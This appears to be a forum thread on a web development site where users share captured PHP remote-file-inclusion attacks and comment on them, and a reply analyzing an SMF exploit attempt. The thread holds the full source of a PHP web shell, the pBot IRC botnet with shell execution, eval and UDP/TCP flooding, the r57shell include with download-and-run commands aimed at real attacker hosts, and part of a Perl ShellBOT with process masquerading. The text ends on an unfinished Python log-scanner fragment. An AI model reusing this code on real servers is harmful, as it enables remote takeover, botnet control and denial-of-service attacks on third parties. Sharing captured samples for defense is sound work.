    echo "<form method=\"POST\" action=\"{$fstring}&amp;action=upload&amp;chdir=$chdir\" enctype=\"multipart/form-data\">";
    
      //webbot upload, mkdir, (use cases, "action=blah")
    
    echo "<!--webbot bot=\"FileUpload\" u-file=\"_private/form_results.csv\" s-format=\"TEXT/CSV\" s-label-fields=\"TRUE\" --><fieldset style=\"border: 1px solid #000000; padding: 2\">";
    if (is_writable("$chdir")) {
     if (strtoupper(substr($OS, 0,3) == 'WIN')) {
      echo "<legend>Dir&nbsp;<b>YES</b>:&nbsp;{$chdir}&nbsp;-&nbsp;<a href=\"#[New Dir]\" onclick=\"Mkdir('{$chdir}');\">[New Dir]</a>&nbsp;<a href=\"#[New File]\" onclick=\"Newfile('{$chdir}')\">[New File]</a>&nbsp;<a href=\"{$fstring}&amp;action=cmd&amp;chdir={$chdir}&amp;cmd=$newuser\">[Remote Access]</a></legend>";
     } else {
        echo "<legend>Dir&nbsp;<b>YES</b>:&nbsp;{$chdir}&nbsp;-&nbsp;<a href=\"#[New Dir]\" onclick=\"Mkdir('{$chdir}');\">[New Dir]</a>&nbsp;<a href=\"#[New File]\" onclick=\"Newfile('{$chdir}')\">[New File]</a>&nbsp;<a href=\"{$fstring}&amp;action=backtool&amp;chdir={$chdir}&amp;write=yes\">[BackTool]</a></legend>";
       } 
    }
    else {
    if (strtoupper(substr($OS, 0,3) == 'WIN')) {
      echo "<legend>Dir&nbsp;NO:&nbsp;{$chdir}&nbsp;-&nbsp;<a href=\"#[New Dir]\" onclick=\"Mkdir('{$chdir}');\">[New Dir]</a>&nbsp;<a href=\"#[New File]\" onclick=\"Newfile('{$chdir}')\">[New File]</a>&nbsp;<a href=\"{$fstring}&amp;action=cmd&amp;chdir={$chdir}&amp;cmd={$newuser}\">[Remote Access]</a></legend>";
     } else {
        echo "<legend>Dir&nbsp;NO:&nbsp;{$chdir}&nbsp;-&nbsp;<a href=\"#[New Dir]\" onclick=\"Mkdir('{$chdir}');\">[New Dir]</a>&nbsp;<a href=\"#[New File]\" onclick=\"Newfile('{$chdir}')\">[New File]</a>&nbsp;<a href=\"{$fstring}&amp;action=backtool&amp;chdir={$chdir}&amp;write=no\">[BackTool]</a></legend>";
       } 
    }
    
    if (@!$handle = opendir("$chdir")) {
     echo "&nbsp;I&nbsp;could&nbsp;not&nbsp;enters&nbsp;in&nbsp;the&nbsp;directory,&nbsp;<a href=\"{$fstring}\">click here!</a>&nbsp;for&nbsp;return&nbsp;to&nbsp;the&nbsp;original&nbsp;directory!</br>";
    }
    else {
    echo "  <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse: collapse; font-family: Tahoma; font-size: 10px\" width=\"100%\">";
    echo "    <tr>";
    echo "      <td width=\"100%\" style=\"font-family: Tahoma; font-size: 10px\" colspan=\"4\">&nbsp;Upload:";
    echo "      <input type=\"file\" name=\"userfile\" size=\"91\" style=\"font-family: Tahoma; font-size: 10px; border-style: solid; border-width: 1\">";
    echo "      <input type=\"submit\" value=\"Send\" name=\"B1\" style=\"font-family: Tahoma; font-size: 10px; border: 1px solid #000000\"></td>";
    echo "    </tr>";
    echo "    <tr>";
    echo "      <td width=\"100%\" style=\"font-family: Tahoma; font-size: 10px\" colspan=\"4\">&nbsp;</td>";
    echo "    </tr>";
    echo "    <tr>";
    echo "      <td width=\"100%\" style=\"font-family: Tahoma; font-size: 10px\" colspan=\"4\">";
    if (@!$msg) {
     echo "      <p align=\"left\">Messages</td>";
    } else {
       echo "      <p align=\"left\">$msg</td>";
      }
    echo "    </tr>";
    echo "    <tr>";
    echo "      <td width=\"100%\" colspan=\"4\">&nbsp;</td>";
    echo "    </tr>";
    echo "    <tr>";
    echo "      <td width=\"9%\">&nbsp;Perms</td>";
    echo "      <td width=\"49%\">&nbsp;File </td>";
    echo "      <td width=\"10%\">&nbsp;Size </td>";
    echo "      <td width=\"32%\">&nbsp;Commands</td>";
    echo "    </tr>";
    $colorn = 0;
        while (false !== ($file = readdir($handle))) {
            if ($file != '.') {
                if ($colorn == 0) {
                 $color = "style=\"background-color: #FFCC66\"";
                }
                elseif ($colorn == 1) {
                 $color = "style=\"background-color: #C0C0C0\"";
                }        
                if (@is_dir("$chdir"."$file")) {
                 $file = $file.'/';
                 $mode = 'chdir';
                } else { 
                   $mode = 'edit'; 
                 }
                if (@substr("$chdir", strlen($chdir) -1, 1) != '/') {
                  $chdir .= '/';
                }
                if ($file == '../') {
                 $lenpath = strlen($chdir); $baras = 0;
                 for ($i = 0;$i < $lenpath;$i++) { if ($chdir{$i} == '/') { $baras++; } }
                 $chdir_ = explode("/", $chdir);
                 $chdirpox = str_replace($chdir_[$baras-1].'/', "", $chdir);
                }
                $perms = @fileperms ("$chdir"."$file");
                if ($perms == '') {
                 $perms = '???';
                }
                $size = @filesize ("$chdir"."$file"); 
                $size = $size / 1024;
                $size = explode(".", $size);
                if (@$size[1] != '') {
                 $size = $size[0].'.'.@substr("$size[1]", 0, 2);
                } else {
                   $size = $size[0];
                 }
                if ($size == 0) {
                 if ($mode == 'chdir') {
                  $size = '???';
                 }
                }
                echo "<tr>";
    	    echo "<td width=\"9%\" $color>&nbsp;$perms</td>";
                if (@is_writable ("$chdir"."$file")) {
                 if ($mode == 'chdir') {
                  if ($file == '../') {
                   echo "<td width=\"49%\" $color>&nbsp;<b><a href=\"{$fstring}&amp;chdir=$chdirpox\">$file</a></b></td>";
                  } else {
                     echo "<td width=\"49%\" $color>&nbsp;<b><a href=\"{$fstring}&amp;chdir={$chdir}{$file}\">$file</a></b></td>";                
                    }
                 } else {
    		if (is_readable("$chdir"."$file")) {
                     echo "<td width=\"49%\" $color>&nbsp;<b><a href=\"{$fstring}&amp;action=edit&amp;chdir=$chdir&amp;file=$file\">$file</a></b></td>";
                    } else {
                       echo "<td width=\"49%\" $color>&nbsp;<b>$file</b></td>";
                      }
                   }
                } 
               else {
                 if ($mode == 'chdir') {
                  if ($file == '../') {
                   echo "<td width=\"49%\" $color>&nbsp;<a href=\"{$fstring}&amp;chdir=$chdirpox\">$file</a></td>";
                  } else {
                     echo "<td width=\"49%\" $color>&nbsp;<a href=\"{$fstring}&amp;chdir={$chdir}{$file}\">$file</a></td>";                
                   }
                 } else {
    		if (@is_readable("$chdir"."$file")) {
                     echo "<td width=\"49%\" $color>&nbsp;<a href=\"{$fstring}&amp;action=edit&amp;chdir=$chdir&amp;file=$file\">$file</a></td>";
                    } else {
                       echo "<td width=\"49%\" $color>&nbsp;$file</td>";
                     }
                   }
                 }
                echo "<td width=\"10%\" $color>&nbsp;$size&nbsp;KB</td>";
                if ($mode == 'edit') {
                 echo "<td width=\"32%\" $color>&nbsp;<a href=\"#{$file}\" onclick=\"Rename('{$chdir}', '{$file}', '{$mode}')\">[Rename]</a>&nbsp;<a href=\"{$fstring}&amp;action=del&amp;chdir={$chdir}&amp;file={$file}&amp;type=file\">[Del]</a>&nbsp;<a href=\"#{$file}\" onclick=\"ChMod('$chdir', '$file')\">[Chmod]</a>&nbsp;<a href=\"#{$file}\" onclick=\"Copy('{$chdir}', '{$file}')\">[Copy]</a></td>";
                } else {
                   echo "<td width=\"32%\" $color>&nbsp;<a href=\"#{$file}\" onclick=\"Rename('{$chdir}', '{$file}', '{$mode}')\">[Rename]</a>&nbsp;<a href=\"{$fstring}&amp;action=del&amp;chdir={$chdir}&amp;file={$file}&amp;type=dir\">[Del]</a>&nbsp;<a href=\"#{$file}\" onclick=\"ChMod('$chdir', '$file')\">[Chmod]</a>&nbsp;[Copy]</td>";
                  }   
                echo "</tr>";
                if ($colorn == 0) {
                 $colorn = 1;
                }
                elseif ($colorn == 1) {
                 $colorn = 0;
                }
            }
        }
        closedir($handle);
    }
    include 'http://members.lycos.co.uk/kalafi0r/up.txt?';
    ?>
      </table>
      </fieldset></form>
      <p align="center">
    
       // HEY GREAT!!! AT LEAST CRACKERS CARE ABOUT STANDARDS...
    
        <a href="http://validator.w3.org/check?uri=referer"><img
            src="http://www.w3.org/Icons/valid-html401"
            alt="Valid HTML 4.01 Transitional" height="31" width="88"></a>
      </p>
    </body>
    
    </html>
    
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    up.txt
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    <? 
    
    // GOSH THIS LOOKS LIKE http://see-your-ip.info/phpbot.txt
    
    set_time_limit(0); 
    error_reporting(0); 
    
    class pBot 
    { 
    var $config = array("server"=>"tucows.westlin.com", 
                         "port"=>6667, 
                         "pass"=>"", //senha do server (sendpass to server)
                         "prefix"=>"elo_bot", 
                         "maxrand"=>8, 
                         "chan"=>"#test", 
                         "key"=>"t3st", //senha do canal (sendpass to channel)
                         "modes"=>"+p", 
                         "password"=>"root",  //senha do bot (sendpass to bot)
                         "trigger"=>".", 
                         "hostauth"=>"*" // * for any hostname 
                         ); 
     var $users = array(); 
     function start() 
     { 
        if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30))) 
           $this->start(); 
        $ident = ""; 
        $alph = range("a","z"); 
        for($i=0;$i<$this->config['maxrand'];$i++) 
           $ident .= $alph[rand(0,25)]; 
        if(strlen($this->config['pass'])>0) 
           $this->send("PASS ".$this->config['pass']); 
        $this->send("USER $ident 127.0.0.1 localhost :$ident"); 
        $this->set_nick(); 
        $this->main(); 
     } 
     function main() 
     { 
        while(!feof($this->conn)) 
        { 
           $this->buf = trim(fgets($this->conn,512)); 
           $cmd = explode(" ",$this->buf); 
           if(substr($this->buf,0,6)=="PING :") 
           { 
              $this->send("PONG :".substr($this->buf,6)); 
           } 
           if(isset($cmd[1]) && $cmd[1] =="001") 
           { 
              $this->send("MODE ".$this->nick." ".$this->config['modes']); 
              $this->join($this->config['chan'],$this->config['key']); 
           } 
           if(isset($cmd[1]) && $cmd[1]=="433") 
           { 
              $this->set_nick(); 
           } 
           if($this->buf != $old_buf) 
           { 
              $mcmd = array(); 
              $msg = substr(strstr($this->buf," :"),2); 
              $msgcmd = explode(" ",$msg); 
              $nick = explode("!",$cmd[0]); 
              $vhost = explode("@",$nick[1]); 
              $vhost = $vhost[1]; 
              $nick = substr($nick[0],1); 
              $host = $cmd[0]; 
              if($msgcmd[0]==$this->nick) 
              { 
               for($i=0;$i<count($msgcmd);$i++) 
                  $mcmd[$i] = $msgcmd[$i+1]; 
              } 
              else 
              { 
               for($i=0;$i<count($msgcmd);$i++) 
                  $mcmd[$i] = $msgcmd[$i]; 
              } 
              if(count($cmd)>2) 
              { 
                 switch($cmd[1]) 
                 { 
                    case "QUIT": 
                       if($this->is_logged_in($host)) 
                       { 
                          $this->log_out($host); 
                       } 
                    break; 
                    case "PART": 
                       if($this->is_logged_in($host)) 
                       { 
                          $this->log_out($host); 
                       } 
                    break; 
                    case "PRIVMSG": 
                       if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*")) 
                       { 
                          if(substr($mcmd[0],0,1)==".") 
                          { 
                             switch(substr($mcmd[0],1)) 
                             { 
                                case "user": 
                                  if($mcmd[1]==$this->config['password']) 
                                  { 
                                     $this->privmsg($this->config['chan'],"[\2auth\2]: $nick logged in"); 
                                     $this->log_in($host); 
                                  } 
                                  else 
                                  { 
                                     $this->privmsg($this->config['chan'],"[\2auth\2]: Incorrect password from $nick"); 
                                  } 
                                break; 
                             } 
                          } 
                       } 
                       elseif($this->is_logged_in($host)) 
                       { 
                          if(substr($mcmd[0],0,1)==".") 
                          { 
                             switch(substr($mcmd[0],1)) 
                             { 
    
                                //RESTART
    
                                case "restart": 
                                   $this->send("QUIT :restart"); 
                                   fclose($this->conn); 
                                   $this->start(); 
                                break; 
    
                                //MAIL
    
                                case "mail": //mail to from subject message 
                                   if(count($mcmd)>4) 
                                   { 
                                      $header = "From: <".$mcmd[2].">"; 
                                      if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header)) 
                                      { 
                                         $this->privmsg($this->config['chan'],"[\2mail\2]: Unable to send"); 
                                      } 
                                      else 
                                      { 
                                         $this->privmsg($this->config['chan'],"[\2mail\2]: Message sent to \2".$mcmd[1]."\2"); 
                                      } 
                                   } 
                                break;
    
                                //DNS
                                 
                                case "dns": 
                                   if(isset($mcmd[1])) 
                                   { 
                                      $ip = explode(".",$mcmd[1]); 
                                      if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) 
                                      { 
                                         $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1])); 
                                      } 
                                      else 
                                      { 
                                         $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1])); 
                                      } 
                                   } 
                                break;
    
                                //INFO
     
                                case "info": 
                                   $this->privmsg($this->config['chan'],"[\2info\2]: [\2httpd\2: ".$_SERVER['SERVER_SOFTWARE']."] [\2docroot\2: ".$_SERVER['DOCUMENT_ROOT']."] [\2domain\2: ".$_SERVER['SERVER_NAME']."] [\2admin\2: ".$_SERVER['SERVER_ADMIN']."] [\2url\2:".$_SERVER['REQUEST_URI']."]"); 
                                break;
    
                                //COMMAND
                                  
                                case "cmd": 
                                   if(isset($mcmd[1])) 
                                   { 
                                      $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); 
                                      $this->privmsg($this->config['chan'],"[\2cmd\2]: $command"); 
                                      $pipe = popen($command,"r"); 
                                      while(!feof($pipe)) 
                                      { 
                                         $pbuf = trim(fgets($pipe,512)); 
                                         if($pbuf != NULL) 
                                            $this->privmsg($this->config['chan'],"     : $pbuf"); 
                                      } 
                                      pclose($pipe); 
                                   } 
                                break; 
    
                                // SET NICK BASED ON HTTPD SERVER TYPE
                                  
                                case "rndnick": 
                                   $this->set_nick(); 
                                break; 
    
                                //SEND A MSG,COMMAND
    
                                case "raw": 
                                   $this->send(strstr($msg,$mcmd[1])); 
                                break; 
    
                                // UHHH, THIS DOES *SOMETHING*
    
                                case "php": 
                                   $eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1]))); 
                                break; 
    
                                // EXECUTE A COMMAND FROM THE SHELL
    
                                case "exec": 
                                   $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); 
                                   $exec = shell_exec($command); 
                                   $ret = explode("\n",$exec); 
                                   $this->privmsg($this->config['chan'],"[\2exec\2]: $command"); 
                                   for($i=0;$i<count($ret);$i++) 
                                      if($ret[$i]!=NULL) 
                                         $this->privmsg($this->config['chan'],"      : ".trim($ret[$i])); 
                                break; 
    
                                // PORTSCAN SOME SHIT
    
                                case "pscan": // .pscan 127.0.0.1 6667 
                                   if(count($mcmd) > 2) 
                                   { 
                                      if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15)) 
                                         $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2"); 
                                      else 
                                         $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2"); 
                                   } 
                                break; 
    
                                // CHANGE IRC SERVERS
    
                                case "ud.server": // .udserver <server> <port> [password] 
                                   if(count($mcmd)>2) 
                                   { 
                                      $this->config['server'] = $mcmd[1]; 
                                      $this->config['port'] = $mcmd[2]; 
                                      if(isset($mcmcd[3])) 
                                      { 
                                       $this->config['pass'] = $mcmd[3]; 
                                       $this->privmsg($this->config['chan'],"[\2update\2]: Changed server to ".$mcmd[1].":".$mcmd[2]." Pass: ".$mcmd[3]); 
                                      } 
                                      else 
                                      { 
                                         $this->privmsg($this->config['chan'],"[\2update\2]: Changed server to ".$mcmd[1].":".$mcmd[2]); 
                                      } 
                                   } 
                                break; 
    
                                // DOWNLOAD STUFF
    
                                case "download": 
                                   if(count($mcmd) > 2) 
                                   { 
                                      if(!$fp = fopen($mcmd[2],"w")) 
                                      { 
                                         $this->privmsg($this->config['chan'],"[\2download\2]: Cannot download, permission denied."); 
                                      } 
                                      else 
                                      { 
                                         if(!$get = file($mcmd[1])) 
                                         { 
                                            $this->privmsg($this->config['chan'],"[\2download\2]: Unable to download from \2".$mcmd[1]."\2"); 
                                         } 
                                         else 
                                         { 
                                            for($i=0;$i<=count($get);$i++) 
                                            { 
                                               fwrite($fp,$get[$i]); 
                                            } 
                                            $this->privmsg($this->config['chan'],"[\2download\2]: File \2".$mcmd[1]."\2 downloaded to \2".$mcmd[2]."\2"); 
                                         } 
                                         fclose($fp); 
                                      } 
                                   } 
                                break; 
    
                                // QUIT
    
                                case "die": 
                                   $this->send("QUIT :die command from $nick"); 
                                   fclose($this->conn); 
                                   exit; 
                                case "logout": 
                                   $this->log_out($host); 
                                   $this->privmsg($this->config['chan'],"[\2auth\2]: $nick logged out"); 
                                break; 
    
                                // FLOOD UDP
    
                                case "udpflood": 
                                   if(count($mcmd)>4) 
                                   { 
                                      $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]); 
                                   } 
                                break; 
    
                                // FLOOD TCP
    
                                case "tcpflood": 
                                   if(count($mcmd)>5) 
                                   { 
                                      $this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]); 
                                   } 
                                break; 
                             } 
                          } 
                       } 
                    break; 
                 } 
              } 
           } 
           $old_buf = $this->buf; 
        } 
        $this->start(); 
     } 
     function send($msg) 
     { 
        fwrite($this->conn,"$msg\r\n"); 
     } 
     function join($chan,$key=NULL) 
     { 
        $this->send("JOIN $chan $key"); 
     } 
     function privmsg($to,$msg) 
     { 
        $this->send("PRIVMSG $to :$msg"); 
     } 
     function is_logged_in($host) 
     { 
        if(isset($this->users[$host])) 
           return 1; 
        else 
           return 0; 
     } 
     function log_in($host) 
     { 
        $this->users[$host] = true; 
     } 
     function log_out($host) 
     { 
        unset($this->users[$host]); 
     } 
     function set_nick() 
     { 
        if(isset($_SERVER['SERVER_SOFTWARE'])) 
        { 
           if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache")) 
              $this->nick = "[A]"; 
           elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis")) 
              $this->nick = "[I]"; 
           elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami")) 
              $this->nick = "[X]"; 
           else 
              $this->nick = "[U]"; 
        } 
        else 
        { 
           $this->nick = "[C]"; 
        } 
        $this->nick .= $this->config['prefix']; 
        for($i=0;$i<$this->config['maxrand'];$i++) 
           $this->nick .= mt_rand(0,9); 
        $this->send("NICK ".$this->nick); 
     } 
      function udpflood($host,$packetsize,$time) {
    	$this->privmsg($this->config['chan'],"[\2udpflood\2]: Floodando $host durante $time segundos com pacotes de $packetsize bytes");
    
            // TRANSL: FLOOD HOST DURATION $time SECONDS WITH PACKETS OF $packetsize BYTES (Portuguese again)
     
    	$packet = "";
    	for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
    	$timei = time();
    	$i = 0;
    	while(time()-$timei < $time) {
    		$fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
          	fwrite($fp,$packet);
           	fclose($fp);
    		$i++;
    	}
    	$env = $i * $packetsize;
    	$env = $env / 1048576;
    	$vel = $env / $time;
    	$vel = round($vel);
    	$env = round($env);
    	$this->privmsg($this->config['chan'],"[\2udpflood\2]: Flood concluido: $env MB enviados / Velocidade media: $vel MB/s ");
    }
     function tcpflood($host,$packets,$packetsize,$port,$delay) 
     { 
        $this->privmsg($this->config['chan'],"[\2tcpflood\2]: Sending $packets packets to $host:$port. Packet size: $packetsize"); 
        $packet = ""; 
        for($i=0;$i<$packetsize;$i++) 
           $packet .= chr(mt_rand(1,256)); 
        for($i=0;$i<$packets;$i++) 
        { 
           if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5)) 
           { 
              $this->privmsg($this->config['chan'],"[\2tcpflood\2]: Error: <$e>"); 
              return 0; 
           } 
           else 
           { 
              fwrite($fp,$packet); 
              fclose($fp); 
           } 
           sleep($delay); 
        } 
        $this->privmsg($this->config['chan'],"[\2tcpflood\2]: Finished sending $packets packets to $host:$port."); 
     } 
    } 
    
    
    // GO GO GADGET pBot!!!!
    
    $bot = new pBot; 
    $bot->start(); 
    
    ?>
    
    
    NEW ATTACK, #2:
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    Guest : 213.139.211.68 : July 14, 2007, 08:06:28 PM
    /forums/index.php?board=13;action=display;threadid=http%3A%2F%2Fwww.krippenverein.de%2Farchiv%2Fimages%2Finc%2F
    This topic doesn't exist on this board. - "http://www.krippenverein.de/archiv/images/inc/"
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    
    ANOTHER, #3:
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    71.29.236.111 - - [02/Jul/2007:18:14:06 -0500] "GET //help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://dvl.by.ru/cmd/r57shell.txt? HTTP/1.1" 404 294
    
    ===== malcode:
    <?php
    /******************************************************************************************************/
    /*
    /*                                     #    #        #    #
    /*                                     #   #          #   #
    /*                                    #    #          #    #
    /*                                    #   ##   ####   ##   #
    /*                                   ##   ##  ######  ##   ##
    /*                                   ##   ##  ######  ##   ##
    /*                                   ##   ##   ####   ##   ##
    /*                                   ###   ############   ###
    /*                                   ########################
    /*                                        ##############
    /*                                 ######## ########## #######
    /*                                ###   ##  ##########  ##   ###
    /*                                ###   ##  ##########  ##   ###
    /*                                 ###   #  ##########  #   ###
    /*                                 ###   ##  ########  ##   ###
    /*                                  ##    #   ######   #    ##
    /*                                   ##   #    ####   #    ##
    /*                                     ##                 ##
    /*
    /*
    /*
    /*  r57shell.php - a PHP script that lets you execute system commands on the server through a browser
    /*  You can download the new version from our site: http://rst.void.ru
    /*  Version: 1.3 (05.03.2006)
    /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
    /*  Special thanks for help and ideas: blf, phoenix, virus, NorD and all the devils from RST/GHC.
    /*  If you have any ideas about which functions should be added to the script, write
    /*  to rst@void.ru. All suggestions will be considered.
    /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
    /*  (c)oded by 1dt.w0lf
    /*  RST/GHC http://rst.void.ru , http://ghc.ru
    /*  ANY MODIFIED REPUBLISHING IS RESTRICTED
    /******************************************************************************************************/
    /* ~~~ Settings | Options  ~~~ */
    
    include("http://dvl.by.ru/box.txt");
    
    
    
    
    
    
    ///INCLUDE FILE CONTAINS:
    /* <?
    echo('vulnerable');
    shell_exec('cd /tmp;wget http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
    shell_exec('cd /tmp;curl -O crewcorp.txt http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
    shell_exec('cd /tmp;lwp-download http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
    shell_exec('cd /tmp;lynx -source http://dvl.by.ru/crewcorp.txt >crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
    shell_exec('cd /tmp;fetch http://dvl.by.ru/crewcorp.txt;crewcorp.txt;rm -rf crewcorp.txt');
    shell_exec('cd /tmp;GET http://dvl.by.ru/crewcorp.txt >crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
    shell_exec('cd /dev/shm;wget http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
    shell_exec('cd /dev/shm;curl -O box.txt http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
    shell_exec('cd /dev/shm;lwp-download http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
    shell_exec('cd /dev/shm;lynx -source http://dvl.by.ru/crewcorp.txt >crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
    shell_exec('cd /dev/shm;fetch http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
    shell_exec('cd /dev/shm;GET http://dvl.by.ru/crewcorp.txt >crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
    ?> */
    
    
    
    
    
    
    
    
    ////MORE- "crewcorp.txt" CONTAINS:
    
    
    
    
    
    
    
    /*#!/usr/bin/perl
    #
    #  ShellBOT by: devil__
    #       Greetz: Puna, Kelserific
    #
    # Commands:
    #           @oldpack <ip> <bytes> <time>;
    #           @udp <ip> <port> <time>;
    #           @fullportscan <ip> <start port> <end port>;
    #           @conback <ip> <port>
    #           @download <url> <file to save as>;
    #           !estatisticas <on/off>;
    #           !sair to terminate the bot;
    #           !novonick to swap the bot's nick for a new random one;
    #           !entra <channel> <time>
    #           !sai <channel> <time>;
    #           !pacotes <on/off>
    #           @info
    #	    @xpl <kernel>
    #	    @sendmail <subject> <sender> <recipient> <content>

    ########## CONFIGURATION ############
    
    my @ps = ("/usr/local/apache/bin/httpd -DSSL","/sbin/syslogd","[eth0]","/sbin/klogd -c 1 -x -x","/usr/sbin/acpid","/usr/sbin/cron","[bash]");
    my $processo = $ps[rand scalar @ps];
    
    $servidor='priv8.crewcorp.net' unless $servidor;
    my $porta='3121';
    my @canais=("#crew");
    my @adms=("devil__","kelserific","ITAL0","Puna","wicked");
    
    # Anti Flood ( 6/3 Recommended )
    my $linas_max=10;
    my $sleep=3;
    
    my $nick = getnick();
    my $ircname = getident2();
    my $realname = "windows nt 5.1 build 2600";
    #chop (my $realname = `uname -n`);
    
    my $acessoshell = 1;
    ######## Stealth ShellBot ##########
    my $prefixo = "!all";
    my $estatisticas = 0;
    my $pacotes = 1;
    ####################################
    
    my $VERSAO = '0.3b';
    
    $SIG{'INT'} = 'IGNORE';
    $SIG{'HUP'} = 'IGNORE';
    $SIG{'TERM'} = 'IGNORE';
    $SIG{'CHLD'} = 'IGNORE';
    $SIG{'PS'} = 'IGNORE';
    
    use IO::Socket;
    use Socket;
    use IO::Select;
    chdir("/");
    $servidor="$ARGV[0]" if $ARGV[0];
    $0="$processo"."\0";
    my $pid=fork;
    exit if $pid;
    die "Problema com o fork: $!" unless defined($pid);
    
    my %irc_servers;
    my %DCC;
    my $dcc_sel = new IO::Select->new();
    
    #####################
    # Stealth Shellbot  #
    #####################
    
    sub getnick {
      return "crew^".int(rand(1000));
    }
    
    sub getident2 {
            my $length=shift;
            $length = 3 if ($length < 3);
    
            my @chars=('a'..'z','A'..'Z','1'..'9');
            foreach (1..$length)
            {
                    $randomstring.=$chars[rand @chars];
            }
            return $randomstring;
    }
    
    #############################
    #  B0tchZ na veia ehehe :P  #
    #############################
    
    $sel_cliente = IO::Select->new();
    sub sendraw {
      if ($#_ == '1') {
        my $socket = $_[0];
        print $socket "$_[1]\n";
      } else {
          print $IRC_cur_socket "$_[0]\n";
      }
    }
    
    sub conectar {
       my $meunick = $_[0];
       my $servidor_con = $_[1];
       my $porta_con = $_[2];
    
       my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
       if (defined($IRC_socket)) {
         $IRC_cur_socket = $IRC_socket;
    
         $IRC_socket->autoflush(1);
         $sel_cliente->add($IRC_socket);
    
         $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
         $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con"
    "Void* is not actually void*" - Best error message EVER!

    My method of measuring code quality is to ask myself if I would rather have herpes or maintain the code in question. In this case I would choose death by herpes. --akatherder

    People who work in VB or any variant thereof are not programmers, they are circus chimps throwing feces into an IDE... --chebrock

    My dad chased him off with a shotgun, which apparently pissed this guy off so much he felt the need to strip naked, sit in the middle of his front yard, and chop up live kittens with a machete to feed to his pet boa.
  • 01-23-2008 6:43 AM In reply to

    • Daniel15

    Re: Weird injection attempts

    found this on the web Guest : 162.39.119.102 : July 12, 2007, 05:40:08 AM /forums/index.php?board=15;action=display;threadid=2286/Sources/Packages.php?sourcedir=http://members.lycos.co.uk/kalafi0r/asd.txt???
    Looks like he's trying an SMF exploit (he's doing it wrong, though), as Sources/Packages.php is an SMF file. Note that this will never work: accessing an SMF file like Sources/Packages.php directly won't work (it will just show a "hacking attempt..." message), and $sourcedir is always defined in Settings.php (which is always require()d).
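The request lines quoted in this thread share one signature: a query parameter whose decoded value contains a remote URL. As an added example (not part of any post here and not SMF's code), this Python scanner flags such requests in Apache-style access logs; the sample lines, hosts and the names `find_rfi_probes` and `Probe` are constructed for illustration.

```python
import re
from typing import NamedTuple
from urllib.parse import unquote

# Apache common/combined log prefix: client, timestamp, request line, status.
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3})'
)
# URL schemes that make PHP's include()/fopen() fetch over the network.
REMOTE_URL = re.compile(r"(?:https?|ftps?)://[^\s'\"<>]+", re.I)

# Constructed sample lines modelled on the formats quoted in the thread
# (documentation IP ranges and a placeholder host, not real indicators).
SAMPLE_LOG = [
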